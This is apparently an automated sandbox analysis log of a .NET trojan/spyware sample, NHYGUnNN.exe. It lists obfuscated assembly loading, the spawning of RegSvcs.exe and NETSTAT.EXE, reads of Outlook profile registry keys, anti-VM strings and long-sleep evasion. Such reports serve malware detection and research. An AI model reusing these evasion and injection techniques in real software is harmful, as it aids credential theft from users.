Source: NHYGUnNN.exe, 00000000.00000002.237146160.0000012A25D66000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
Source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
Source: NHYGUnNN.exe, 00000000.00000002.237199303.0000012A25EE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs NHYGUnNN.exe
Source: NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBUMBUM.dll. vs NHYGUnNN.exe
Source: NHYGUnNN.exe Binary or memory string: OriginalFilenameHMMCXNXCJKFD.exe: vs NHYGUnNN.exe
Source: NHYGUnNN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NHYGUnNN.exe ReversingLabs: Detection: 27%
Source: C:\Users\user\Desktop\NHYGUnNN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\NHYGUnNN.exe C:\Users\user\Desktop\NHYGUnNN.exe
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\NHYGUnNN.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.log
Source: C:\Windows\SysWOW64\NETSTAT.EXE File created: C:\Users\user\AppData\Local\Temp\1--Lt08NN
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@6/6
Source: NHYGUnNN.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
Source: C:\Users\user\Desktop\NHYGUnNN.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: NHYGUnNN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NHYGUnNN.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: NHYGUnNN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdb source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdb source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000001.00000003.237929727.0000000001137000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000003.236683417.0000000000F98000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.320124356.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000003.318032789.00000000031D3000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\HMMCXNXCJKFD.pdbBSJB source: NHYGUnNN.exe
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 0000000A.00000002.501502525.00000000038B3000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BUMBUM.pdbBSJB source: NHYGUnNN.exe, 00000000.00000002.238037858.0000012A279A8000.00000004.00000800.00020000.00000000.sdmp, NHYGUnNN.exe, 00000000.00000002.237890834.0000012A27840000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: NHYGUnNN.exe, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.NHYGUnNN.exe.12a25d20000.0.unpack, A/cb0864eb24eeeb94488d89ba2673ea289.cs .Net Code: c7f594fa444d3738d4ed4d33557eff5b6 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_0000012A25D250CF push rdx; ret 0_2_0000012A25D250D5
Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_00007FFCA43F417B push edx; ret 0_2_00007FFCA43F417C
Source: C:\Users\user\Desktop\NHYGUnNN.exe Code function: 0_2_00007FFCA43F4185 push edx; ret 0_2_00007FFCA43F4186
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0134D0D1 push ecx; ret 1_2_0134D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004210E9 push eax; ret 1_2_004210EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004210F2 push eax; ret 1_2_00421159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0042109C push eax; ret 1_2_004210EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00421153 push eax; ret 1_2_00421159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041E901 push ebp; ret 1_2_0041E902
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00405A1E push ecx; ret 1_2_004059E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004172D0 push edx; retf 1_2_004172D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040A2E4 push ecx; iretd 1_2_0040A2E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409B74 push ecx; retf 1_2_00409B7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00408BAF push cx; ret 1_2_00408C27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00409CB7 push cs; retf 1_2_00409CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041A528 push ebp; ret 1_2_0041A532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004085F9 pushfd ; iretd 1_2_00408601
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040CF66 push cs; ret 1_2_0040CF69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041AFA7 push ecx; ret 1_2_0041AFA8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035ED0D1 push ecx; ret 10_2_035ED0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BCB82F push cs; ret 10_2_00BCB832
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD9870 push ecx; ret 10_2_00BD9871
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF9BB push eax; ret 10_2_00BDFA22
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF9B2 push eax; ret 10_2_00BDF9B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDD1CA push ebp; ret 10_2_00BDD1CB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDF965 push eax; ret 10_2_00BDF9B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC423B push ds; iretd 10_2_00BC4250
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BDFA1C push eax; ret 10_2_00BDFA22
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC4212 push ds; iretd 10_2_00BC4250
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BC4254 push 793A76E7h; ret 10_2_00BC425C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD5B99 push edx; retf 10_2_00BD5B9F
Source: initial sample Static PE information: section name: .text entropy: 7.879743437690199
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NHYGUnNN.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4760 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
Source: C:\Users\user\Desktop\NHYGUnNN.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 6.1 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE API coverage: 9.6 %
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_00BD2CA0 FindFirstFileW,FindNextFileW,FindClose, 10_2_00BD2CA0
Source: C:\Users\user\Desktop\NHYGUnNN.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: NHYGUnNN.exe, 00000000.00000002.240647032.0000012A3AB7D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3Ts+
Source: NHYGUnNN.exe, 00000000.00000002.239226226.0000012A39A02000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/
Source: explorer.exe, 00000002.00000000.296608102.00000000045B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.303615769.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000002.00000000.279110893.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATAi
Source: NHYGUnNN.exe, 00000000.00000002.240917397.0000012A3ABFE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
Source: NHYGUnNN.exe, 00000000.00000002.241144747.0000012A3AC7E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %C30PR9jBAtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/VphMpV3Ts+
Source: explorer.exe, 00000002.00000000.252879418.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: NHYGUnNN.exe, 00000000.00000002.240357022.0000012A3AAF8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %AtZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
Source: NHYGUnNN.exe, 00000000.00000002.239851941.0000012A3AA71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %tZhgFSZj9Dz1yuMzNKqbSEUnF+IaOYCOQ61mnNld0M4/l%phMpl%3
Source: explorer.exe, 00000002.00000000.282562714.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.252366258.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 rdtsc 1_2_013C5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132513A mov eax, dword ptr fs:[00000030h] 1_2_0132513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov eax, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01314120 mov ecx, dword ptr fs:[00000030h] 1_2_01314120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9100 mov eax, dword ptr fs:[00000030h] 1_2_012F9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FC962 mov eax, dword ptr fs:[00000030h] 1_2_012FC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB171 mov eax, dword ptr fs:[00000030h] 1_2_012FB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B944 mov eax, dword ptr fs:[00000030h] 1_2_0131B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013751BE mov eax, dword ptr fs:[00000030h] 1_2_013751BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov ecx, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013199BF mov eax, dword ptr fs:[00000030h] 1_2_013199BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013769A6 mov eax, dword ptr fs:[00000030h] 1_2_013769A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013261A0 mov eax, dword ptr fs:[00000030h] 1_2_013261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B49A4 mov eax, dword ptr fs:[00000030h] 1_2_013B49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322990 mov eax, dword ptr fs:[00000030h] 1_2_01322990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131C182 mov eax, dword ptr fs:[00000030h] 1_2_0131C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A185 mov eax, dword ptr fs:[00000030h] 1_2_0132A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012FB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013841E8 mov eax, dword ptr fs:[00000030h] 1_2_013841E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A830 mov eax, dword ptr fs:[00000030h] 1_2_0131A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130B02A mov eax, dword ptr fs:[00000030h] 1_2_0130B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132002D mov eax, dword ptr fs:[00000030h] 1_2_0132002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377016 mov eax, dword ptr fs:[00000030h] 1_2_01377016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C4015 mov eax, dword ptr fs:[00000030h] 1_2_013C4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2073 mov eax, dword ptr fs:[00000030h] 1_2_013B2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C1074 mov eax, dword ptr fs:[00000030h] 1_2_013C1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01310050 mov eax, dword ptr fs:[00000030h] 1_2_01310050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132F0BF mov ecx, dword ptr fs:[00000030h] 1_2_0132F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132F0BF mov eax, dword ptr fs:[00000030h] 1_2_0132F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013220A0 mov eax, dword ptr fs:[00000030h] 1_2_013220A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013390AF mov eax, dword ptr fs:[00000030h] 1_2_013390AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9080 mov eax, dword ptr fs:[00000030h] 1_2_012F9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01373884 mov eax, dword ptr fs:[00000030h] 1_2_01373884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F58EC mov eax, dword ptr fs:[00000030h] 1_2_012F58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F40E1 mov eax, dword ptr fs:[00000030h] 1_2_012F40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B8E4 mov eax, dword ptr fs:[00000030h] 1_2_0131B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0138B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B131B mov eax, dword ptr fs:[00000030h] 1_2_013B131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A309 mov eax, dword ptr fs:[00000030h] 1_2_0131A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01323B7A mov eax, dword ptr fs:[00000030h] 1_2_01323B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FDB60 mov ecx, dword ptr fs:[00000030h] 1_2_012FDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8B58 mov eax, dword ptr fs:[00000030h] 1_2_013C8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FDB40 mov eax, dword ptr fs:[00000030h] 1_2_012FDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FF358 mov eax, dword ptr fs:[00000030h] 1_2_012FF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C5BA5 mov eax, dword ptr fs:[00000030h] 1_2_013C5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324BAD mov eax, dword ptr fs:[00000030h] 1_2_01324BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132B390 mov eax, dword ptr fs:[00000030h] 1_2_0132B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322397 mov eax, dword ptr fs:[00000030h] 1_2_01322397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B138A mov eax, dword ptr fs:[00000030h] 1_2_013B138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132138B mov eax, dword ptr fs:[00000030h] 1_2_0132138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AD380 mov ecx, dword ptr fs:[00000030h] 1_2_013AD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01301B8F mov eax, dword ptr fs:[00000030h] 1_2_01301B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013203E2 mov eax, dword ptr fs:[00000030h] 1_2_013203E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131DBE9 mov eax, dword ptr fs:[00000030h] 1_2_0131DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 mov ecx, dword ptr fs:[00000030h] 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A23E3 mov eax, dword ptr fs:[00000030h] 1_2_013A23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013753CA mov eax, dword ptr fs:[00000030h] 1_2_013753CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B236 mov eax, dword ptr fs:[00000030h] 1_2_0131B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131A229 mov eax, dword ptr fs:[00000030h] 1_2_0131A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01334A2C mov eax, dword ptr fs:[00000030h] 1_2_01334A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01313A1C mov eax, dword ptr fs:[00000030h] 1_2_01313A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h] 1_2_013BAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FAA16 mov eax, dword ptr fs:[00000030h] 1_2_012FAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01308A0A mov eax, dword ptr fs:[00000030h] 1_2_01308A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F5210 mov eax, dword ptr fs:[00000030h] 1_2_012F5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F5210 mov ecx, dword ptr fs:[00000030h] 1_2_012F5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0133927A mov eax, dword ptr fs:[00000030h] 1_2_0133927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AB260 mov eax, dword ptr fs:[00000030h] 1_2_013AB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8A62 mov eax, dword ptr fs:[00000030h] 1_2_013C8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BEA55 mov eax, dword ptr fs:[00000030h] 1_2_013BEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F9240 mov eax, dword ptr fs:[00000030h] 1_2_012F9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01384257 mov eax, dword ptr fs:[00000030h] 1_2_01384257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0130AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132FAB0 mov eax, dword ptr fs:[00000030h] 1_2_0132FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F52A5 mov eax, dword ptr fs:[00000030h] 1_2_012F52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132D294 mov eax, dword ptr fs:[00000030h] 1_2_0132D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4AEF mov eax, dword ptr fs:[00000030h] 1_2_013B4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322AE4 mov eax, dword ptr fs:[00000030h] 1_2_01322AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322ACB mov eax, dword ptr fs:[00000030h] 1_2_01322ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0137A537 mov eax, dword ptr fs:[00000030h] 1_2_0137A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BE539 mov eax, dword ptr fs:[00000030h] 1_2_013BE539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01303D34 mov eax, dword ptr fs:[00000030h] 1_2_01303D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8D34 mov eax, dword ptr fs:[00000030h] 1_2_013C8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01324D3B mov eax, dword ptr fs:[00000030h] 1_2_01324D3B
